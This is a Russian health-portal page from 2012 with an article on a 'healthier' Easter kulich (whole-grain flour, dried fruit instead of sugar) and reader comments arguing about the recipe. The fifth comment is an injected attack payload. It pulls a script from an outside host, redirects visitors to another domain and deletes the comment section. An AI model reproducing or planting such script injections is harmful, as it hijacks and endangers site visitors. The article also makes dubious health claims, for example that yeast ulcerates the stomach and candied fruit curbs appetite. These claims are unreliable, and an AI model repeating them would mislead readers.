Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пасхальный кулич с пользо...  >>  Пасхальный кулич с пользой
 
Обратная связь
 

Пасхальный кулич с пользой

Размер шрифта
13 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Именно таким хлебом апостолы обозначали место, которое должен был занимать Иисус Христос после распятия и воскрешения. Теперь это вкусное пасхальное блюдо. Как приготовить кулич, чтобы он был не только вкусным, но и полезным?

Состав кулича

  • Мука. Этот компонент обладает высоким гликемическим индексом, т.е. углеводы из муки всасываются очень быстро, повышение уровня глюкозы вызывает выброс большого количества инсулина. Углеводы утилизируются в клетках с помощью инсулина и мозг снова сигнализирует о голоде. Причем промежуток времени насыщения совсем небольшой. Мука повышает аппетит.
  • Дрожжи. Дрожжи в любом виде – это содружество микроорганизмов, которые поедая сахар из теплой и влажной среды, выделяют углекислый газ, разрыхляющий тесто, от чего оно становится пышным.

Дрожжи провоцируют повышенное газообразование, бурление в животе и отрыжку. Желудок от большого количества пищи и без того чрезмерно наполнен, а газы еще больше его расширяют. Сфинктер, т.е. заслонка, закрывающая обратный ход в пищевод, не срабатывает, и пищевые массы во время отрыжки вместе с желудочным соком забрасываются в пищевод. Стенки пищевода раздражаются, желудок изъязвляется.

  • Сахар. Это углеводы, которые помогают освобождают серотонин, поэтому человек испытывает радость. Сладкое повышает настроение, но нужно учитывать его высокий гликемический индекс.

Замена ингредиентов

Для того чтобы сделать пасхальный кулич более полезным, нужно выше описанные компоненты заменить:

  • Муку высшего сорта лучше заменить на необдирную муку грубого помола с отрубями.
  • Добавляем цукаты, чтобы заполнить объем теста и еще больше снизить количество муки. Цукаты также содержат грубые волокна, которые имеют вещества, снижающие аппетит.
  • Сахар заменяем на большое количество сухофруктов с непрямыми углеводами в составе, которые будут перевариваться гораздо дольше, чем углеводы из сахара.

Сюжеты по теме:
Пасхальный кулич

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

13 апреля 2012 в 15:00

Цитировать   |   Пожаловаться

Если как советуете печь из серой муки без сахара, но с дрожжами, это получится кислая вонючая подошва, а не сдобный кулич! Сами-то будете такое есть?  Если нет сахара (заменяете фруктами), то что дрожжи кушать будут для пышности? Эти "кулинарные советы" - полное фиаско женской части программы по части готовки!!!

Гость 13 апреля 2012 в 15:00
печь из серой муки без сахара, но с дрожжами
Думаю, этот  рецепт для тех, кому уж очень хочется кулича, но нельзя сахара и белой муки - углеводов с высоким ГИ. Что называется - компромисс. 

3 - Гость

16 апреля 2012 в 14:42

Цитировать   |   Пожаловаться

Это не компромисс, а издевательство! тем, кому нельзя кулич, можно пару вареных яиц, не смертельно! Да и от кусочка кулича ничего страшного не будет!

4 - Гость

28 февраля 2013 в 00:30

Цитировать   |   Пожаловаться

между прочим зря вы так ругаете эти рецепты. мне из за аллергии нельзя ни сахар, ни яйца, ни еще кучу продуктов. и что теперь, совсем вкусного не есть??? я уже давно пеку без сахара и отличные кексы, блины, даже торты получаются! заменяю фруктами, сухофруктами, соками... а прежде чем осуждать рецепт, нужно его попробовать.
СПАСИБО создателям программы за много вкусных и очень полезных рецептов - жизнь стала ярче и интереснее)))

5 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда после застолья   В вопросе ГМО поставлена точка! Есть или не есть?   Творожная пасха: как подготовиться к празднику   Сыр домашний для здоровья костей  

Слайдшоу

Ошибки в еде, которые вы точно делаете!    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.